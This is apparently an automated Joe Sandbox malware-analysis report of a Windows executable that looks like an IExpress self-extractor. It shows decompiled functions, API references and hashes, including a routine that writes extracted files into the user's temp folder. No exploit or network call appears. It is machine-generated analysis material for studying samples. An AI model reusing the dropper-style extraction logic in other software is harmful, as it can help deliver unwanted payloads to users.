                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: 177d5653225be3a6abf36a0b280c4e6f4923ab716b0fb9d562f4fe8e64217676
                                                                        • Instruction ID: 878de875e4707e3e455fc99bd1b14f8017da6b9c1c0c41485132ce70c7f4fddc
                                                                        • Opcode Fuzzy Hash: 177d5653225be3a6abf36a0b280c4e6f4923ab716b0fb9d562f4fe8e64217676
                                                                        • Instruction Fuzzy Hash: 9301ADA73002143BE3271A66BC86F7B629EDB94795F014027B706E57809A78CC414175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E003D43D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0x3d9a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}













                                                                        0x003d19e0
                                                                        0x003d19e0
                                                                        0x003d19eb
                                                                        0x003d19f2
                                                                        0x003d19f9
                                                                        0x003d19fc
                                                                        0x003d1a01
                                                                        0x003d1a2a
                                                                        0x003d1a2e
                                                                        0x003d1a3e
                                                                        0x003d1a4f
                                                                        0x003d1a62
                                                                        0x003d1a6a
                                                                        0x00000000
                                                                        0x003d1a03
                                                                        0x003d1a06
                                                                        0x003d1a20
                                                                        0x003d1a20
                                                                        0x003d1a08
                                                                        0x003d1a08
                                                                        0x003d1a14
                                                                        0x00000000
                                                                        0x003d1a16
                                                                        0x003d1a18
                                                                        0x003d1a70
                                                                        0x003d1a72
                                                                        0x003d1a72
                                                                        0x003d1a14
                                                                        0x003d1a06
                                                                        0x003d1a81

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 003D1A18
                                                                        • GetDesktopWindow.USER32 ref: 003D1A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 003D1A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 003D1A62
                                                                        • MessageBeep.USER32(000000FF), ref: 003D1A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: a7444c8bebd7d94c3eae1382e08e2e2f0a8994f806e8b8e23e90853c0269f39b
                                                                        • Instruction ID: d5e9a166a704e36b045859964ababa68a0b33f96e65ddaf4395ad14bd8c37e3c
                                                                        • Opcode Fuzzy Hash: a7444c8bebd7d94c3eae1382e08e2e2f0a8994f806e8b8e23e90853c0269f39b
                                                                        • Instruction Fuzzy Hash: 2011A532502119AFDB12EF64FE09BAE77BCEF49300F104156F91297291DA309F11CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E003D63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E003D1781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				E003D658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0x3d9124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0x3d9124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E003D6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}















                                                                        0x003d63cb
                                                                        0x003d63d2
                                                                        0x003d63d8
                                                                        0x003d63ea
                                                                        0x003d63f3
                                                                        0x003d6401
                                                                        0x003d6402
                                                                        0x003d6410
                                                                        0x003d6415
                                                                        0x003d6433
                                                                        0x003d6438
                                                                        0x003d6449
                                                                        0x003d6463
                                                                        0x003d646d
                                                                        0x003d6477
                                                                        0x003d6477
                                                                        0x003d647a
                                                                        0x003d643a
                                                                        0x003d643a
                                                                        0x003d6444
                                                                        0x003d6444
                                                                        0x003d6492

                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D63EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 1065093856-1955631000
                                                                        • Opcode ID: 9c74b9d5a4e5febb9515e163ddd87d5f44c2353506781a968351b9ad34c27f86
                                                                        • Instruction ID: 7b60223d063a43b966898803be4a33e3da0d0d95fc8f3349b8a775092c8016d7
                                                                        • Opcode Fuzzy Hash: 9c74b9d5a4e5febb9515e163ddd87d5f44c2353506781a968351b9ad34c27f86
                                                                        • Instruction Fuzzy Hash: AA21C372A01218ABD712DF25EC86FEA737CEB45314F00416BF595A7280DAB06D848FA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D47E0(intOrPtr* __ecx) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
                                                                        						E003D1680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0x3d91e0; // 0x2b58300
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0x3d91e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0x3d8584; // 0x0
                                                                        					E003D44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0x3d8584; // 0x0
                                                                        				E003D44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}















                                                                        0x003d47e8
                                                                        0x003d47f0
                                                                        0x003d47f4
                                                                        0x003d480f
                                                                        0x003d4811
                                                                        0x003d4814
                                                                        0x003d4814
                                                                        0x003d4816
                                                                        0x003d4817
                                                                        0x003d4829
                                                                        0x003d482b
                                                                        0x003d482f
                                                                        0x003d484f
                                                                        0x003d4852
                                                                        0x003d4855
                                                                        0x003d4855
                                                                        0x003d4857
                                                                        0x003d4858
                                                                        0x003d4860
                                                                        0x003d4865
                                                                        0x003d486a
                                                                        0x003d486f
                                                                        0x00000000
                                                                        0x003d4876
                                                                        0x003d4831
                                                                        0x003d4841
                                                                        0x003d4847
                                                                        0x003d480b
                                                                        0x00000000
                                                                        0x003d480b
                                                                        0x003d47f6
                                                                        0x003d4806
                                                                        0x00000000

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,003D4E6F), ref: 003D47EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 003D4823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 003D4847
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D4851
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 359063898-1955631000
                                                                        • Opcode ID: 36130f00c282f9bf7f31c6311e0f523181ef226fd04f54eb5659c8832edb8a20
                                                                        • Instruction ID: 3fa7bcc4a6e9b2eea0df313bd05981766a6f3f5e3c4dafa531683250dc2077c4
                                                                        • Opcode Fuzzy Hash: 36130f00c282f9bf7f31c6311e0f523181ef226fd04f54eb5659c8832edb8a20
                                                                        • Instruction Fuzzy Hash: 4D1102766056426FD7178F24FC18F723B6EEB85340F04851BEA829B341DA369C068660
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D3680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}







                                                                        0x003d368c
                                                                        0x003d368f
                                                                        0x003d3691
                                                                        0x003d369f
                                                                        0x003d36a7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d36ba
                                                                        0x00000000
                                                                        0x003d36bc
                                                                        0x003d36bc
                                                                        0x003d36c0
                                                                        0x003d36cb
                                                                        0x003d36c2
                                                                        0x003d36c4
                                                                        0x003d36c4
                                                                        0x003d36da
                                                                        0x003d36e0
                                                                        0x003d36e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d36e6
                                                                        0x00000000
                                                                        0x003d36ba
                                                                        0x003d36ed

                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003D369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36B2
                                                                        • DispatchMessageA.USER32(?), ref: 003D36CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 45d5bd70e35698eabe3b134a88c4e7c2a455df76b31ba6e0096f88b5db1a9f22
                                                                        • Instruction ID: de78255a7aee21a43cd4c059627c1e6d9914de6265dec7f8cd48792a42c69147
                                                                        • Opcode Fuzzy Hash: 45d5bd70e35698eabe3b134a88c4e7c2a455df76b31ba6e0096f88b5db1a9f22
                                                                        • Instruction Fuzzy Hash: 3A01677390125577DB314BA67D88EEBBB7CEBC6B10F15011BF915E2280D561CA44C671
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E003D65E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}









                                                                        0x003d65e8
                                                                        0x003d65ed
                                                                        0x003d65ef
                                                                        0x003d65f2
                                                                        0x003d65f4
                                                                        0x003d65f4
                                                                        0x003d65f6
                                                                        0x003d65f7
                                                                        0x003d6608
                                                                        0x003d6611
                                                                        0x003d6618
                                                                        0x003d661c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d660e
                                                                        0x003d6623
                                                                        0x003d6625
                                                                        0x003d663b
                                                                        0x003d663b
                                                                        0x003d663d
                                                                        0x003d6641
                                                                        0x003d6610
                                                                        0x003d6610
                                                                        0x00000000
                                                                        0x003d6610
                                                                        0x003d6644
                                                                        0x003d6647
                                                                        0x003d6647
                                                                        0x003d6621
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,003D2B33), ref: 003D6602
                                                                        • CharPrevA.USER32(?,00000000), ref: 003D6612
                                                                        • CharPrevA.USER32(?,00000000), ref: 003D6629
                                                                        • CharNextA.USER32(00000000), ref: 003D6635
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: 4a24ef0a05e4cd57727a777e180b5ab34c778e839b6dea8cf30f2738e1937318
                                                                        • Instruction ID: 2ef1a99d4bbe5c42267eeb2a461ff186eb8421d989a4f60190b95a9e990d6d8b
                                                                        • Opcode Fuzzy Hash: 4a24ef0a05e4cd57727a777e180b5ab34c778e839b6dea8cf30f2738e1937318
                                                                        • Instruction Fuzzy Hash: F6F028334059506EE7331F28BC888BBBF9CCF8B354F2A01AFE4E282201D6154E468661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D69B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0x3d81f8 = E003D6C70();
                                                                        				__set_app_type(E003D6FBE(2));
                                                                        				 *0x3d88a4 =  *0x3d88a4 | 0xffffffff;
                                                                        				 *0x3d88a8 =  *0x3d88a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0x3d8528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0x3d851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E003D7000();
                                                                        				if( *0x3d8000 == 0) {
                                                                        					__setusermatherr(E003D7000);
                                                                        				}
                                                                        				E003D71EF(_t6);
                                                                        				return 0;
                                                                        			}








                                                                        0x003d69b7
                                                                        0x003d69c2
                                                                        0x003d69c8
                                                                        0x003d69cf
                                                                        0x003d69d8
                                                                        0x003d69de
                                                                        0x003d69e4
                                                                        0x003d69e6
                                                                        0x003d69ec
                                                                        0x003d69f2
                                                                        0x003d69f4
                                                                        0x003d6a00
                                                                        0x003d6a07
                                                                        0x003d6a0d
                                                                        0x003d6a0e
                                                                        0x003d6a15

                                                                        APIs
                                                                          • Part of subcall function 003D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 003D6FC5
                                                                        • __set_app_type.MSVCRT ref: 003D69C2
                                                                        • __p__fmode.MSVCRT ref: 003D69D8
                                                                        • __p__commode.MSVCRT ref: 003D69E6
                                                                        • __setusermatherr.MSVCRT ref: 003D6A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: 8dea93e1adc27aefea82c9e9ec284f48f8f8475132a30ee6e6772a6b97d1912e
                                                                        • Instruction ID: 7806fd8220ba80f8eaa06d1a26b59074919f1b7b5b9b3c91d533bfa462bdaa33
                                                                        • Opcode Fuzzy Hash: 8dea93e1adc27aefea82c9e9ec284f48f8f8475132a30ee6e6772a6b97d1912e
                                                                        • Instruction Fuzzy Hash: 3FF01CB210A7019FC717AB35FE0A6083B69FB05331F104A0BE4A18A3F1DF3AA554CA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D6952(CHAR* __ecx) {
                                                                        				long _v8;
                                                                        				long _v12;
                                                                        				long _v16;
                                                                        				char _v20;
                                                                        				int _t22;
                                                                        
                                                                        				_t22 = 0;
                                                                        				_v12 = 0;
                                                                        				_v8 = 0;
                                                                        				_v20 = 0;
                                                                        				_v16 = 0;
                                                                        				if( *__ecx != 0) {
                                                                        					_t6 =  &_v20; // 0x3d5760
                                                                        					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                        						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                        					}
                                                                        				}
                                                                        				return _t22;
                                                                        			}








                                                                        0x003d695b
                                                                        0x003d6960
                                                                        0x003d6963
                                                                        0x003d6966
                                                                        0x003d6969
                                                                        0x003d696c
                                                                        0x003d6972
                                                                        0x003d6987
                                                                        0x003d699f
                                                                        0x003d699f
                                                                        0x003d6987
                                                                        0x003d69a7

                                                                        APIs
                                                                        • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W=,?,00000000,003D5760,?,A:\), ref: 003D697F
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 003D6999
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DiskFreeSpace
                                                                        • String ID: `W=
                                                                        • API String ID: 1705453755-436508080
                                                                        • Opcode ID: 26ab0ccefc75b0e1d8dc3109833aa4c678be90649123ba54b1665fe8fec38ca7
                                                                        • Instruction ID: 190f7fb84efa5adf1fd67542a0b1f4e727004c72e0a65ed459a99e93a161611e
                                                                        • Opcode Fuzzy Hash: 26ab0ccefc75b0e1d8dc3109833aa4c678be90649123ba54b1665fe8fec38ca7
                                                                        • Instruction Fuzzy Hash: 0EF0E7B6D01228BBCB12DFE89D45ADEBBBCEB48700F104197A510E2240D6719A008B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:26.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:969
                                                                        Total number of Limit Nodes:42
